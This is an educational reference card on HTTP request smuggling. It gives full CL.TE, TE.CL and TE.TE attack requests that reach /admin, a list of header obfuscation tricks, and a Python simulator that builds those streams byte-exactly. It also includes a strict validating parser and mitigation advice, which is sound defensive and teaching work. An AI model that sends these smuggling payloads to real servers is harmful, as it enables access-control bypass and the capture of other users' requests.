HTTP Request Smuggling Reference Card
A comprehensive reference card with key HTTP request smuggling patterns, techniques, and mitigation strategies. Download it as a PDF for offline reference.
A quick reference guide to common attack patterns
CL.TE Attack Pattern
Content-Length frontend, Transfer-Encoding backend
Description:
Frontend server frames the request by Content-Length, backend frames it by Transfer-Encoding. The frontend forwards the whole body as declared by Content-Length (here 46 bytes, which must equal the exact byte count of the body including every CRLF); the backend reads the same body as chunked, meets the terminating 0 chunk immediately, and treats everything after it as the start of the next request.
Request (every line ends in CRLF):
POST /example HTTP/1.1
Host: example.com
Content-Length: 46
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: example.com
X
Impact:
Backend sees two requests: the original POST with an empty chunked body, and a smuggled GET /admin that the frontend never inspected as a request of its own, so frontend access controls on /admin are bypassed. The final line "X" is deliberately left unterminated: the next request the frontend forwards over the same backend connection is appended to it, so that request's first line becomes part of the smuggled request instead of being served on its own.
TE.CL Attack Pattern
Transfer-Encoding frontend, Content-Length backend
Description:
Frontend server frames the request by Transfer-Encoding, backend frames it by Content-Length. The frontend reads the complete chunked body and forwards it; the backend takes only the first 4 bytes (the chunk-size line "41" plus its CRLF) as the POST body and parses the chunk data that follows as a new request.
Request (every line ends in CRLF; 41 is the hex size of the 65-byte chunk):
POST /example HTTP/1.1
Host: example.com
Content-Length: 4
Transfer-Encoding: chunked

41
GET /admin HTTP/1.1
Host: example.com
Content-Length: 10

x=1
0
Impact:
Frontend processes one complete chunked request, but backend consumes only the 4 bytes "41\r\n" as the POST body and then parses "GET /admin ..." as a second request. The smuggled request carries its own Content-Length: 10, which covers exactly "x=1" plus the trailing "\r\n0\r\n\r\n" chunk terminator, so nothing is left dangling on the backend connection after the smuggled request is processed.
TE.TE Attack Pattern
Different Transfer-Encoding interpretations
Description:
Both servers support Transfer-Encoding, but the header is obfuscated (here duplicated) so that one of them stops recognising it and falls back to Content-Length. The pair then behaves as CL.TE or TE.CL depending on which side fell back, which is why the request still needs a Content-Length that matches the body.
Request (every line ends in CRLF):
POST /example HTTP/1.1
Host: example.com
Content-Length: 46
Transfer-Encoding: chunked
Transfer-Encoding: identity

0

GET /admin HTTP/1.1
Host: example.com
X
Impact:
A server that honours the first Transfer-Encoding header treats the body as chunked; one that honours the last (identity) frames it by Content-Length instead. If the frontend falls back to Content-Length while the backend still applies chunked, the result is the same two-request split as CL.TE; if the roles are reversed, the body needs the TE.CL layout instead.
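The three splits above, as an added example that is not part of the original card: a small Python simulator written for this page that frames one byte stream the way a Content-Length-only parser and a Transfer-Encoding parser would, with the Transfer-Encoding parser honouring either the first or the last duplicate header. It reuses the card's requests byte for byte (example.com, /example and /admin are placeholders), computes every Content-Length and chunk size from the actual bytes, and appends a hypothetical victim request (VICTIM) to the CL.TE stream to show the unterminated "X" line absorbing it. The parser is deliberately lenient, the way a permissive server is.

```python
# Added example for this page, not code from the original reference card.
# A lenient HTTP/1.1 framing simulator: the same bytes are framed by a
# Content-Length-only parser ("cl") and by Transfer-Encoding parsers that honour
# either the first or the last Transfer-Encoding header ("te-first"/"te-last").
# Requests are constructed here; example.com, /example and /admin are placeholders.

CRLF = b"\r\n"


def parse_head(data: bytes):
    """Return (request_line, [(name, value), ...], head_length) or None if the head is incomplete."""
    end = data.find(b"\r\n\r\n")
    if end == -1:
        return None  # a real server would block waiting for more bytes
    lines = data[:end].decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, end + 4


def header_value(headers, name, policy):
    """Value of header `name`; `policy` ('first' or 'last') decides which duplicate wins."""
    values = [v for n, v in headers if n == name]
    if not values:
        return None
    return values[0] if policy == "first" else values[-1]


def end_of_chunked_body(data: bytes, pos: int) -> int:
    """Walk chunk-size lines from `pos` to the terminating 0 chunk; return the offset after it."""
    while True:
        line_end = data.index(CRLF, pos)
        size = int(data[pos:line_end].split(b";")[0], 16)  # chunk extensions are ignored
        pos = line_end + 2
        if size == 0:
            return pos + 2  # CRLF that closes the (empty) trailer section
        pos += size + 2  # chunk data plus the CRLF that follows it


def frame(data: bytes, mode: str):
    """Request lines a parser in `mode` ('cl', 'te-first', 'te-last') sees in `data`."""
    seen, pos = [], 0
    while pos < len(data):
        head = parse_head(data[pos:])
        if head is None:  # leftover bytes with no complete head: they wait for the next request
            first_line = data[pos:].split(CRLF, 1)[0].decode("latin-1")
            seen.append(first_line + " [incomplete: absorbs the next request's bytes]")
            break
        request_line, headers, head_len = head
        body_start = pos + head_len
        te = header_value(headers, "transfer-encoding", mode[3:]) if mode != "cl" else None
        if te is not None and "chunked" in te.lower():
            pos = end_of_chunked_body(data, body_start)
        else:
            pos = body_start + int(header_value(headers, "content-length", "last") or 0)
        seen.append(request_line)
    return seen


# --- constructed attack streams; Content-Length values are computed from the exact bytes ---
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: example.com\r\nX"  # 'X' is deliberately unterminated
CL_TE_BODY = b"0\r\n\r\n" + SMUGGLED                            # 46 bytes
CL_TE = (b"POST /example HTTP/1.1\r\nHost: example.com\r\n"
         + b"Content-Length: %d\r\nTransfer-Encoding: chunked\r\n\r\n" % len(CL_TE_BODY)
         + CL_TE_BODY)
# TE.CL: the smuggled request declares Content-Length: 10, exactly "x=1\r\n0\r\n\r\n",
# so it also swallows the chunk terminator and leaves the connection clean.
INNER = b"GET /admin HTTP/1.1\r\nHost: example.com\r\nContent-Length: 10\r\n\r\nx=1"  # 65 bytes = 0x41
TE_CL = (b"POST /example HTTP/1.1\r\nHost: example.com\r\n"
         b"Content-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n"  # 4 bytes covers "41\r\n"
         + b"%x\r\n" % len(INNER) + INNER + b"\r\n0\r\n\r\n")
TE_TE = (b"POST /example HTTP/1.1\r\nHost: example.com\r\n"
         + b"Content-Length: %d\r\n" % len(CL_TE_BODY)
         + b"Transfer-Encoding: chunked\r\nTransfer-Encoding: identity\r\n\r\n"
         + CL_TE_BODY)
VICTIM = b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"  # hypothetical next user on the same backend connection


def demo():
    """(front-end view, back-end view) of the request stream for each pattern."""
    return {
        "CL.TE": (frame(CL_TE + VICTIM, "cl"), frame(CL_TE + VICTIM, "te-last")),
        "TE.CL": (frame(TE_CL, "te-last"), frame(TE_CL, "cl")),
        "TE.TE": (frame(TE_TE, "te-last"), frame(TE_TE, "te-first")),
    }


if __name__ == "__main__":
    for name, (front, back) in demo().items():
        print(f"{name}: front-end sees {front}")
        print(f"{' ' * len(name)}  back-end sees  {back}")
```

For CL.TE the front-end view of the stream is the POST followed by the victim's GET /, while the back-end view is the POST followed by GET /admin with the victim's request line swallowed into the unterminated "X" header; for TE.CL the front-end sees one request and the back-end two; for TE.TE the same bytes are one request under last-header-wins and two under first-header-wins. Changing any byte of SMUGGLED or INNER is safe because the lengths are recomputed, which is the discipline to keep when building these requests by hand.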
Obfuscation Techniques
Methods to bypass security controls
Common techniques (each aims to make one server recognise "chunked" while the other does not):
- Case variations: Transfer-Encoding vs transfer-encoding (header names are case-insensitive per RFC, so this only catches parsers that compare names case-sensitively)
- Header value obfuscation: chunked vs chu\nked (a bare line feed inside the value)
- Multiple encodings or duplicate headers: Transfer-Encoding: gzip, chunked (chunked is not the only value, or not the only Transfer-Encoding header)
- Unusual whitespace: Transfer-Encoding:\tchunked, Transfer-Encoding : chunked (space before the colon), or a leading space on the header line
- Header splitting: X: y\nTransfer-Encoding: chunked (a bare LF instead of CRLF between the two, so one parser sees a second header while another sees a single X header with the rest as its value)
Mitigation Strategies
Server Configuration:
- Disable reuse of backend connections (one backend connection per frontend request); this removes the cross-user impact of a desync at a performance cost
- Use HTTP/2 end to end for backend connections; HTTP/2 frames carry an explicit length, so there is no Content-Length vs Transfer-Encoding ambiguity. Terminating HTTP/2 at the frontend and downgrading to HTTP/1.1 towards the backend reintroduces the problem (H2.CL and H2.TE variants).
- Ensure every server in the chain parses HTTP identically (same software and version where possible)
- Have the frontend re-frame each request before forwarding: de-chunk the body and send a single accurate Content-Length with no Transfer-Encoding header
Request Validation:
- Reject requests that carry both Content-Length and Transfer-Encoding, duplicate or conflicting Content-Length values, or any Transfer-Encoding other than a single "chunked" (RFC 9112 section 6.1 allows a server to reject a request with both headers and requires it to close the connection afterwards)
- Normalize Transfer-Encoding and Content-Length headers (canonical case, no surrounding whitespace) and forward only the normalized form, never the client's raw bytes
- Parse strictly: CRLF line endings only, no bare LF, no obsolete line folding, no whitespace before the colon
- Use WAF rules to detect smuggling patterns as defence in depth; a WAF is itself an HTTP parser and can be desynchronised, so it does not replace the fixes above
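A strict front-end check of the kind the Request Validation list describes, run over the obfuscation variants from the section above, as an added example that is not part of the original card. The rules are this example's own policy and are stricter than RFC 9112 strictly requires (it rejects any Transfer-Encoding other than exactly "chunked", while the RFC permits other codings before chunked); the sample requests and the check_head function are constructed for this page.

```python
# Added example for this page, not code from the original reference card.
# A strict validator for one HTTP/1.1 request head. It rejects the ambiguities
# the obfuscation list relies on and, when the head is clean, re-emits it in
# canonical form so the back-end never sees the client's exact bytes.
# Policy is this example's own and stricter than RFC 9112; samples are constructed.
import re

TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")  # header-name characters (RFC 9110 token)


def canonical_name(name: str) -> str:
    """'transfer-encoding' -> 'Transfer-Encoding' (names are case-insensitive; pick one spelling)."""
    return "-".join(part.capitalize() for part in name.split("-"))


def check_head(raw: bytes):
    """Return (accepted, reason, canonical_head_bytes_or_None) for one request head."""
    end = raw.find(b"\r\n\r\n")
    if end == -1:
        return False, "head not terminated by CRLF CRLF", None
    head = raw[:end]
    if b"\n" in head.replace(b"\r\n", b""):
        return False, "bare LF inside head", None  # chu\nked, X: y\nTransfer-Encoding: chunked
    lines = head.decode("latin-1").split("\r\n")
    if len(lines[0].split(" ")) != 3:
        return False, "malformed request line", None
    parsed, cl_values, te_values = [], [], []
    for line in lines[1:]:
        if line[:1] in (" ", "\t"):
            return False, "obsolete line folding / leading whitespace", None
        name, sep, value = line.partition(":")
        if not sep or not TOKEN.match(name):
            return False, f"malformed header name {name!r}", None  # also 'Transfer-Encoding : chunked'
        name, value = name.lower(), value.strip(" \t")  # tab or space OWS is normalised away here
        if name == "content-length":
            if not value.isdigit():
                return False, f"non-numeric Content-Length {value!r}", None
            cl_values.append(value)
        elif name == "transfer-encoding":
            te_values.append(value.lower())
        parsed.append((name, value))
    if cl_values and te_values:
        return False, "both Content-Length and Transfer-Encoding present", None
    if len(set(cl_values)) > 1:
        return False, "conflicting Content-Length values", None
    if len(te_values) > 1:
        return False, "duplicate Transfer-Encoding headers", None
    if te_values and te_values[0] != "chunked":
        return False, f"Transfer-Encoding {te_values[0]!r} is not exactly 'chunked'", None
    canonical = lines[0] + "\r\n" + "".join(f"{canonical_name(n)}: {v}\r\n" for n, v in parsed) + "\r\n"
    return True, "ok", canonical.encode("latin-1")


PREFIX = b"POST /example HTTP/1.1\r\nHost: example.com\r\n"
CASES = {  # constructed samples covering the obfuscation list; verdicts are checked in the test
    "clean chunked":      PREFIX + b"Transfer-Encoding: chunked\r\n\r\n",
    "lowercase name":     PREFIX + b"transfer-encoding: chunked\r\n\r\n",
    "tab before value":   PREFIX + b"Transfer-Encoding:\tchunked\r\n\r\n",
    "CL and TE together": PREFIX + b"Content-Length: 5\r\nTransfer-Encoding: chunked\r\n\r\n",
    "duplicate TE":       PREFIX + b"Transfer-Encoding: chunked\r\nTransfer-Encoding: identity\r\n\r\n",
    "gzip, chunked":      PREFIX + b"Transfer-Encoding: gzip, chunked\r\n\r\n",
    "LF inside value":    PREFIX + b"Transfer-Encoding: chu\nked\r\n\r\n",
    "LF header split":    PREFIX + b"X: y\nTransfer-Encoding: chunked\r\n\r\n",
    "space before colon": PREFIX + b"Transfer-Encoding : chunked\r\n\r\n",
    "leading space":      PREFIX + b" Transfer-Encoding: chunked\r\n\r\n",
    "conflicting CL":     PREFIX + b"Content-Length: 5\r\nContent-Length: 6\r\n\r\n",
}


def verdicts():
    """Case name -> accepted flag, for every constructed sample."""
    return {name: check_head(raw)[0] for name, raw in CASES.items()}


if __name__ == "__main__":
    for name, raw in CASES.items():
        ok, why, _canon = check_head(raw)
        print(f"{'ACCEPT' if ok else 'REJECT'}  {name:20} {why}")
```

Only the clean, lowercase-name and tab-OWS variants are accepted, and all three are forwarded as the same canonical "Transfer-Encoding: chunked" line, so a back-end that treats tab or lowercase differently never sees them. Everything else in the obfuscation list is refused before it reaches the back-end. Pair this with connection closing after any rejection, as RFC 9112 requires when both framing headers are present, so that a rejected request cannot poison bytes still queued on the connection.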
© 2025 Learn Web Basics | For educational purposes only
How to Use This Reference Card
This reference card is designed to be a quick reference guide for security professionals, penetration testers, and web developers. It provides a concise overview of common HTTP request smuggling patterns, techniques, and mitigation strategies.
For security professionals: Use this card during security assessments to identify potential HTTP request smuggling vulnerabilities.
For developers: Reference this card when implementing security controls to prevent HTTP request smuggling attacks.
For students: Study this card to understand the mechanics of HTTP request smuggling and how to prevent it.